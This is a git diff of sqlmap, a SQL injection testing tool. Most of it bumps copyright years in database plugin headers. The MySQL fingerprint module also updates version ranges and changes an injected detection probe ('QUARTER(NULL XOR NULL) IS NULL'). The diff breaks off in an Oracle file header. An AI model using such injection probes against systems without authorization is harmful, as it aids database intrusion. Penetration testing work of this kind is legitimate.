@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/h2/enumeration.py b/plugins/dbms/h2/enumeration.py
index 81fb1a52a..d833de65c 100644
--- a/plugins/dbms/h2/enumeration.py
+++ b/plugins/dbms/h2/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/h2/filesystem.py b/plugins/dbms/h2/filesystem.py
index e2074d150..42a8943ee 100644
--- a/plugins/dbms/h2/filesystem.py
+++ b/plugins/dbms/h2/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/h2/fingerprint.py b/plugins/dbms/h2/fingerprint.py
index c1403e592..822e1723e 100644
--- a/plugins/dbms/h2/fingerprint.py
+++ b/plugins/dbms/h2/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/h2/syntax.py b/plugins/dbms/h2/syntax.py
index 9bd95ffd2..27a7f0ddf 100644
--- a/plugins/dbms/h2/syntax.py
+++ b/plugins/dbms/h2/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/h2/takeover.py b/plugins/dbms/h2/takeover.py
index 15f437e56..556a11c76 100644
--- a/plugins/dbms/h2/takeover.py
+++ b/plugins/dbms/h2/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/hsqldb/__init__.py b/plugins/dbms/hsqldb/__init__.py
index 542095116..46745fa79 100644
--- a/plugins/dbms/hsqldb/__init__.py
+++ b/plugins/dbms/hsqldb/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/hsqldb/connector.py b/plugins/dbms/hsqldb/connector.py
index 40b47e8a5..3f46a69b7 100644
--- a/plugins/dbms/hsqldb/connector.py
+++ b/plugins/dbms/hsqldb/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/hsqldb/enumeration.py b/plugins/dbms/hsqldb/enumeration.py
index 3692153ff..06e0397c2 100644
--- a/plugins/dbms/hsqldb/enumeration.py
+++ b/plugins/dbms/hsqldb/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/hsqldb/filesystem.py b/plugins/dbms/hsqldb/filesystem.py
index abe6592ba..b27607190 100644
--- a/plugins/dbms/hsqldb/filesystem.py
+++ b/plugins/dbms/hsqldb/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/hsqldb/fingerprint.py b/plugins/dbms/hsqldb/fingerprint.py
index 348e5ba27..86aa0aeaa 100644
--- a/plugins/dbms/hsqldb/fingerprint.py
+++ b/plugins/dbms/hsqldb/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/hsqldb/syntax.py b/plugins/dbms/hsqldb/syntax.py
index 9bd95ffd2..27a7f0ddf 100644
--- a/plugins/dbms/hsqldb/syntax.py
+++ b/plugins/dbms/hsqldb/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/hsqldb/takeover.py b/plugins/dbms/hsqldb/takeover.py
index 692ce013c..99a8a03ce 100644
--- a/plugins/dbms/hsqldb/takeover.py
+++ b/plugins/dbms/hsqldb/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/informix/__init__.py b/plugins/dbms/informix/__init__.py
index a9958c20a..ca2f8f1ef 100644
--- a/plugins/dbms/informix/__init__.py
+++ b/plugins/dbms/informix/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/informix/connector.py b/plugins/dbms/informix/connector.py
index 137353514..7b75e4051 100644
--- a/plugins/dbms/informix/connector.py
+++ b/plugins/dbms/informix/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/informix/enumeration.py b/plugins/dbms/informix/enumeration.py
index 8e2d938c2..f878f27e7 100644
--- a/plugins/dbms/informix/enumeration.py
+++ b/plugins/dbms/informix/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/informix/filesystem.py b/plugins/dbms/informix/filesystem.py
index 2ff16d48d..bf4d5c5ba 100644
--- a/plugins/dbms/informix/filesystem.py
+++ b/plugins/dbms/informix/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/informix/fingerprint.py b/plugins/dbms/informix/fingerprint.py
index 843dc0532..c190fa080 100644
--- a/plugins/dbms/informix/fingerprint.py
+++ b/plugins/dbms/informix/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/informix/syntax.py b/plugins/dbms/informix/syntax.py
index 984fd58a5..a7e307bf4 100644
--- a/plugins/dbms/informix/syntax.py
+++ b/plugins/dbms/informix/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/informix/takeover.py b/plugins/dbms/informix/takeover.py
index 1d0ae95f4..bcbc4b5e1 100644
--- a/plugins/dbms/informix/takeover.py
+++ b/plugins/dbms/informix/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/maxdb/__init__.py b/plugins/dbms/maxdb/__init__.py
index fb4519224..6ab3b3d87 100644
--- a/plugins/dbms/maxdb/__init__.py
+++ b/plugins/dbms/maxdb/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/maxdb/connector.py b/plugins/dbms/maxdb/connector.py
index 0107f8b95..14d22ee24 100644
--- a/plugins/dbms/maxdb/connector.py
+++ b/plugins/dbms/maxdb/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/maxdb/enumeration.py b/plugins/dbms/maxdb/enumeration.py
index f6dcf2042..a83b9c2fa 100644
--- a/plugins/dbms/maxdb/enumeration.py
+++ b/plugins/dbms/maxdb/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/maxdb/filesystem.py b/plugins/dbms/maxdb/filesystem.py
index c9d66b101..d06d159cd 100644
--- a/plugins/dbms/maxdb/filesystem.py
+++ b/plugins/dbms/maxdb/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/maxdb/fingerprint.py b/plugins/dbms/maxdb/fingerprint.py
index 5dcea6a48..2f8788ac7 100644
--- a/plugins/dbms/maxdb/fingerprint.py
+++ b/plugins/dbms/maxdb/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/maxdb/syntax.py b/plugins/dbms/maxdb/syntax.py
index 6b5fd76a6..b53aa83ad 100644
--- a/plugins/dbms/maxdb/syntax.py
+++ b/plugins/dbms/maxdb/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/maxdb/takeover.py b/plugins/dbms/maxdb/takeover.py
index 69d7283f3..0a51217c2 100644
--- a/plugins/dbms/maxdb/takeover.py
+++ b/plugins/dbms/maxdb/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mckoi/__init__.py b/plugins/dbms/mckoi/__init__.py
index 00a39a507..3e41787ec 100644
--- a/plugins/dbms/mckoi/__init__.py
+++ b/plugins/dbms/mckoi/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mckoi/connector.py b/plugins/dbms/mckoi/connector.py
index 3645c9a5c..128c77b2d 100644
--- a/plugins/dbms/mckoi/connector.py
+++ b/plugins/dbms/mckoi/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mckoi/enumeration.py b/plugins/dbms/mckoi/enumeration.py
index a4ddb06ca..3b9028083 100644
--- a/plugins/dbms/mckoi/enumeration.py
+++ b/plugins/dbms/mckoi/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mckoi/filesystem.py b/plugins/dbms/mckoi/filesystem.py
index 65807cfa3..49ea280be 100644
--- a/plugins/dbms/mckoi/filesystem.py
+++ b/plugins/dbms/mckoi/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mckoi/fingerprint.py b/plugins/dbms/mckoi/fingerprint.py
index 6bdace647..a3bfde48f 100644
--- a/plugins/dbms/mckoi/fingerprint.py
+++ b/plugins/dbms/mckoi/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mckoi/syntax.py b/plugins/dbms/mckoi/syntax.py
index 6b5fd76a6..b53aa83ad 100644
--- a/plugins/dbms/mckoi/syntax.py
+++ b/plugins/dbms/mckoi/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mckoi/takeover.py b/plugins/dbms/mckoi/takeover.py
index 012122c73..cbc55ae11 100644
--- a/plugins/dbms/mckoi/takeover.py
+++ b/plugins/dbms/mckoi/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mimersql/__init__.py b/plugins/dbms/mimersql/__init__.py
index 37d384833..fbf38d9c9 100644
--- a/plugins/dbms/mimersql/__init__.py
+++ b/plugins/dbms/mimersql/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mimersql/connector.py b/plugins/dbms/mimersql/connector.py
index 93a392216..4307f5b69 100644
--- a/plugins/dbms/mimersql/connector.py
+++ b/plugins/dbms/mimersql/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mimersql/enumeration.py b/plugins/dbms/mimersql/enumeration.py
index b27f593aa..57a9f22eb 100644
--- a/plugins/dbms/mimersql/enumeration.py
+++ b/plugins/dbms/mimersql/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mimersql/filesystem.py b/plugins/dbms/mimersql/filesystem.py
index 2ff16d48d..bf4d5c5ba 100644
--- a/plugins/dbms/mimersql/filesystem.py
+++ b/plugins/dbms/mimersql/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mimersql/fingerprint.py b/plugins/dbms/mimersql/fingerprint.py
index 6e367a1ae..8052ee022 100644
--- a/plugins/dbms/mimersql/fingerprint.py
+++ b/plugins/dbms/mimersql/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mimersql/syntax.py b/plugins/dbms/mimersql/syntax.py
index 8cd965a4c..2d63b897e 100644
--- a/plugins/dbms/mimersql/syntax.py
+++ b/plugins/dbms/mimersql/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mimersql/takeover.py b/plugins/dbms/mimersql/takeover.py
index 9a95b286d..497745a0c 100644
--- a/plugins/dbms/mimersql/takeover.py
+++ b/plugins/dbms/mimersql/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/monetdb/__init__.py b/plugins/dbms/monetdb/__init__.py
index 94f64c0ed..ef29a313f 100644
--- a/plugins/dbms/monetdb/__init__.py
+++ b/plugins/dbms/monetdb/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/monetdb/connector.py b/plugins/dbms/monetdb/connector.py
index 68b14d3e4..7fb635e87 100644
--- a/plugins/dbms/monetdb/connector.py
+++ b/plugins/dbms/monetdb/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/monetdb/enumeration.py b/plugins/dbms/monetdb/enumeration.py
index 570785e23..10b528c7d 100644
--- a/plugins/dbms/monetdb/enumeration.py
+++ b/plugins/dbms/monetdb/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/monetdb/filesystem.py b/plugins/dbms/monetdb/filesystem.py
index 2ff16d48d..bf4d5c5ba 100644
--- a/plugins/dbms/monetdb/filesystem.py
+++ b/plugins/dbms/monetdb/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/monetdb/fingerprint.py b/plugins/dbms/monetdb/fingerprint.py
index 85d0a1591..bda2504eb 100644
--- a/plugins/dbms/monetdb/fingerprint.py
+++ b/plugins/dbms/monetdb/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/monetdb/syntax.py b/plugins/dbms/monetdb/syntax.py
index 63593591e..1fc6130fc 100644
--- a/plugins/dbms/monetdb/syntax.py
+++ b/plugins/dbms/monetdb/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/monetdb/takeover.py b/plugins/dbms/monetdb/takeover.py
index f097e5e2e..f38bd0c89 100644
--- a/plugins/dbms/monetdb/takeover.py
+++ b/plugins/dbms/monetdb/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mssqlserver/__init__.py b/plugins/dbms/mssqlserver/__init__.py
index e55c3e0c8..28e2dc4af 100644
--- a/plugins/dbms/mssqlserver/__init__.py
+++ b/plugins/dbms/mssqlserver/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mssqlserver/connector.py b/plugins/dbms/mssqlserver/connector.py
index 96c41f3ed..92b37287d 100644
--- a/plugins/dbms/mssqlserver/connector.py
+++ b/plugins/dbms/mssqlserver/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py
index 6654fe67b..e5407ceec 100644
--- a/plugins/dbms/mssqlserver/enumeration.py
+++ b/plugins/dbms/mssqlserver/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mssqlserver/filesystem.py b/plugins/dbms/mssqlserver/filesystem.py
index ddf7c12f6..1a8e87f41 100644
--- a/plugins/dbms/mssqlserver/filesystem.py
+++ b/plugins/dbms/mssqlserver/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py
index 709a4f030..41658cdae 100644
--- a/plugins/dbms/mssqlserver/fingerprint.py
+++ b/plugins/dbms/mssqlserver/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mssqlserver/syntax.py b/plugins/dbms/mssqlserver/syntax.py
index 9bd4473dd..dad14e4a4 100644
--- a/plugins/dbms/mssqlserver/syntax.py
+++ b/plugins/dbms/mssqlserver/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mssqlserver/takeover.py b/plugins/dbms/mssqlserver/takeover.py
index d35b0c237..58cf875ad 100644
--- a/plugins/dbms/mssqlserver/takeover.py
+++ b/plugins/dbms/mssqlserver/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mysql/__init__.py b/plugins/dbms/mysql/__init__.py
index 12c652017..04a2bdabb 100644
--- a/plugins/dbms/mysql/__init__.py
+++ b/plugins/dbms/mysql/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mysql/connector.py b/plugins/dbms/mysql/connector.py
index fb7f7a75d..41590b8d7 100644
--- a/plugins/dbms/mysql/connector.py
+++ b/plugins/dbms/mysql/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mysql/enumeration.py b/plugins/dbms/mysql/enumeration.py
index 88046b692..8e9d81f7d 100644
--- a/plugins/dbms/mysql/enumeration.py
+++ b/plugins/dbms/mysql/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py
index 8dfb5fb7c..e72cbcba3 100644
--- a/plugins/dbms/mysql/filesystem.py
+++ b/plugins/dbms/mysql/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py
index e004ad5ad..cb9343dd3 100644
--- a/plugins/dbms/mysql/fingerprint.py
+++ b/plugins/dbms/mysql/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -47,11 +47,11 @@ class Fingerprint(GenericFingerprint):
versions = (
(80000, 80029), # MySQL 8.0
(60000, 60014), # MySQL 6.0
- (50700, 50739), # MySQL 5.7
+ (50700, 50741), # MySQL 5.7
(50600, 50652), # MySQL 5.6
(50500, 50563), # MySQL 5.5
(50400, 50404), # MySQL 5.4
- (50100, 50175), # MySQL 5.1
+ (50100, 50174), # MySQL 5.1
(50000, 50097), # MySQL 5.0
(40100, 40131), # MySQL 4.1
(40000, 40032), # MySQL 4.0
@@ -175,7 +175,7 @@ class Fingerprint(GenericFingerprint):
infoMsg = "testing %s" % DBMS.MYSQL
logger.info(infoMsg)
- result = inject.checkBooleanExpression("QUARTER(NULL) IS NULL")
+ result = inject.checkBooleanExpression("QUARTER(NULL XOR NULL) IS NULL")
if result:
infoMsg = "confirming %s" % DBMS.MYSQL
diff --git a/plugins/dbms/mysql/syntax.py b/plugins/dbms/mysql/syntax.py
index 25493221a..57399752c 100644
--- a/plugins/dbms/mysql/syntax.py
+++ b/plugins/dbms/mysql/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/mysql/takeover.py b/plugins/dbms/mysql/takeover.py
index c9343a346..31033cca4 100644
--- a/plugins/dbms/mysql/takeover.py
+++ b/plugins/dbms/mysql/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/oracle/__init__.py b/plugins/dbms/oracle/__init__.py
index 548843eee..292727d1d 100644
--- a/plugins/dbms/oracle/__init__.py
+++ b/plugins/dbms/oracle/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
